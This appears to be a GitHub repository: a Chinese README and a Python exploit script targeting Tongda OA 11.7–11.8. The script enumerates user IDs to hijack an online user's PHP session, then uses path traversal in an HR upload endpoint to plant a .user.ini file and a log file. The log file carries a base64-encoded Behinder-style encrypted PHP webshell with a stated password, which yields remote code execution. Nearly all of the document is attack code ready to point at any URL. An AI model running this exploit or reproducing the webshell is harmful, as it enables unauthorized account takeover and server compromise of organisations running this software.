├── README.md └── TongdaOA.py /README.md: -------------------------------------------------------------------------------- 1 | # 通达OA-exp 2 | 3 | **v11.7~v11.8任意用户登录+后台日志GetShell** 4 | 5 | 前台通过遍历UID找到在线的人员后,获取phpsession后即可登录 6 | 7 | 后台通过.user.ini文件进行解析日志文件 8 | 9 | ![image-20210524230404313](https://oss.zjun.info/zjun.info/20210524230405.png) 10 | 11 | 12 | 13 | **思路来源** 14 | 15 | https://lorexxar.cn/2021/03/03/tongda11-7rce/ 16 | 17 | https://lorexxar.cn/2021/03/09/tongda11-8/ -------------------------------------------------------------------------------- /TongdaOA.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import requests 3 | import sys 4 | import re 5 | import time 6 | 7 | # 思路参考: 8 | # https://lorexxar.cn/2021/03/03/tongda11-7rce/ 9 | # https://lorexxar.cn/2021/03/09/tongda11-8/ 10 | 11 | RED = '\x1b[1;91m' 12 | BLUE = '\033[1;94m' 13 | GREEN = '\033[1;32m' 14 | BOLD = '\033[1m' 15 | ENDC = '\033[0m' 16 | 17 | requests.packages.urllib3.disable_warnings() 18 | 19 | headers = { 20 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.360', 21 | } 22 | 23 | 24 | def title(): 25 | print(BOLD + ''' 26 | Title: TongdaOA任意用户登录 + 后台Getshell 27 | Version: 通达OA 11.7 ~ 11.8 28 | Author: zjun 29 | HomePage: https://www.zjun.info 30 | ''' + ENDC) 31 | 32 | 33 | def Target_Info(target_url): 34 | print(BLUE + '\n[*]正在获取版本信息\n' + ENDC) 35 | url = target_url + 'inc/expired.php' 36 | try: 37 | response = requests.get(url=url, headers=headers, timeout=5, verify=False) 38 | pattern = re.compile('(.*?)', re.S) 39 | info = re.findall(pattern, response.text) 40 | print(GREEN + info[0].replace('
', '').replace(' ', '').replace(' ', '').strip() + '\n' + ENDC) 41 | except: 42 | print(RED + '未发现版本信息\n' + ENDC) 43 | 44 | 45 | def Target_URL(target_url, uid): 46 | url = target_url + 'mobile/auth_mobi.php?isAvatar=1&uid=%d&P_VER=0' % (uid) 47 | manage = target_url + "general/" 48 | print(BLUE + '[*]正在遍历UID=%d' % (uid) + ENDC) 49 | try: 50 | response = requests.get(url=url, headers=headers, timeout=5, verify=False) 51 | if "RELOGIN" in response.text and response.status_code == 200: 52 | print(RED + '目标用户为离线状态\n' + ENDC) 53 | elif response.status_code == 200 and response.text == "": 54 | print(GREEN + '目标用户在线,请先访问: \n' + url + '\n再访问后台: \n' + manage + '\n' + ENDC) 55 | pattern = re.findall(r'PHPSESSID=(.*?);', str(response.headers)) 56 | cookie = "PHPSESSID={}".format(pattern[0]) 57 | return cookie 58 | else: 59 | print(RED + '未知错误,目标可能不存在或不存在该漏洞\n' + ENDC) 60 | sys.exit(0) 61 | except Exception as e: 62 | print(RED + '请求失败,无法建立有效连接\n' + ENDC) 63 | sys.exit(0) 64 | 65 | 66 | def Upload_Ini(target_url, cookie): 67 | headers = { 68 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.360', 69 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 70 | 'Cookie': cookie, 71 | 'Content-Type': 'multipart/form-data; boundary=---------------------------17518323986548992951984057104', 72 | } 73 | payload = 'general/hr/manage/staff_info/update.php?USER_ID=../../general\\reportshop\workshop\\report\\attachment-remark/.user' 74 | data = base64.b64decode( 75 | 'LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0iMTExMTExLmluaSIKQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluCgphdXRvX3ByZXBlbmRfZmlsZT0xMTExMTEubG9nCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTc1MTgzMjM5ODY1NDg5OTI5NTE5ODQwNTcxMDQKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJzdWJtaXQiCgrmj5DkuqQKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNC0t') 76 | try: 77 | res = requests.post(url=target_url + payload, data=data, headers=headers, timeout=5, verify=False) 78 | if res.status_code == 200 and '档案已保存' in res.text: 79 | print(BLUE + '[*] 成功上传.user.ini文件!' + ENDC) 80 | Upload_Log(target_url, cookie) 81 | else: 82 | print(RED + '[-] 上传.user.ini文件失败!' + ENDC) 83 | sys.exit(0) 84 | except: 85 | pass 86 | 87 | 88 | def Upload_Log(target_url, cookie): 89 | headers = { 90 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.360', 91 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 92 | 'Cookie': cookie, 93 | 'Content-Type': 'multipart/form-data; boundary=---------------------------17518323986548992951984057104', 94 | } 95 | payload = 'general/hr/manage/staff_info/update.php?USER_ID=../../general\\reportshop\workshop\\report\\attachment-remark/111111' 96 | data = base64.b64decode( 97 | 'LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0iMTExMTExLmxvZyIKQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluCgo8P3BocAplY2hvICdpdCB3b3JrJzsKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7CgkkX1NFU1NJT05bJ2snXT0ka2V5OwoJc2Vzc2lvbl93cml0ZV9jbG9zZSgpOwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zdC4iIik7CgoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOwogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19pbnZva2UoJHApIHtldmFsKCRwLiIiKTt9fQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7Cj8+Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTc1MTgzMjM5ODY1NDg5OTI5NTE5ODQwNTcxMDQKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJzdWJtaXQiCgrmj5DkuqQKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNC0t') 98 | try: 99 | res = requests.post(url=target_url + payload, data=data, headers=headers, timeout=5, verify=False) 100 | if res.status_code == 200 and '档案已保存' in res.text: 101 | print(BLUE + '[*] 成功上传log文件!' + ENDC) 102 | Get_Shell(target_url, cookie) 103 | else: 104 | print(RED + '[-] 上传log文件失败!' + ENDC) 105 | sys.exit(0) 106 | except: 107 | pass 108 | 109 | 110 | def Get_Shell(target_url, cookie): 111 | headers = { 112 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.360', 113 | 'Cookie': cookie 114 | } 115 | payload = 'general/reportshop/workshop/report/attachment-remark/form.inc.php' 116 | try: 117 | res = requests.get(url=target_url + payload, headers=headers, timeout=5, verify=False) 118 | if res.status_code == 200 and 'it work' in res.text: 119 | print(GREEN + '[+] 成功上传冰蝎三Shell, 密码为: rebeyond' + ENDC) 120 | print(GREEN + '[+] Shell地址为: {}'.format(target_url + payload) + ENDC) 121 | else: 122 | print(GREEN + '[+] 成功上传冰蝎三Shell, 密码为: rebeyond' + ENDC) 123 | print(GREEN + '[+] Shell地址为: {}'.format(target_url + payload) + ENDC) 124 | print(RED + '[!] 可能需要等待一会儿即可连接。' + ENDC) 125 | except: 126 | pass 127 | 128 | 129 | if __name__ == '__main__': 130 | title() 131 | target_url = str(input(BOLD + 'Url: ' + ENDC)) 132 | if target_url[-1] != '/': 133 | target_url += '/' 134 | print(BLUE + '\nTarget: ' + target_url + ENDC) 135 | Target_Info(target_url) 136 | res = input(BOLD + '默认sleep=0, 是否遍历UID? (y/n): ' + ENDC) 137 | if res == 'y': 138 | for i in range(1, 1000): 139 | uid = i 140 | time.sleep(0) 141 | cookie = Target_URL(target_url, uid) 142 | if cookie != None: 143 | break 144 | else: 145 | print(BOLD + '\n[+]exit' + ENDC) 146 | sys.exit(0) 147 | res = input(BOLD + '默认shell为冰蝎三, 是否GetShell? (y/n): ' + ENDC) 148 | if res == 'y': 149 | Upload_Ini(target_url, cookie) 150 | else: 151 | print(BOLD + '\n[+]exit' + ENDC) 152 | sys.exit(0) 153 | --------------------------------------------------------------------------------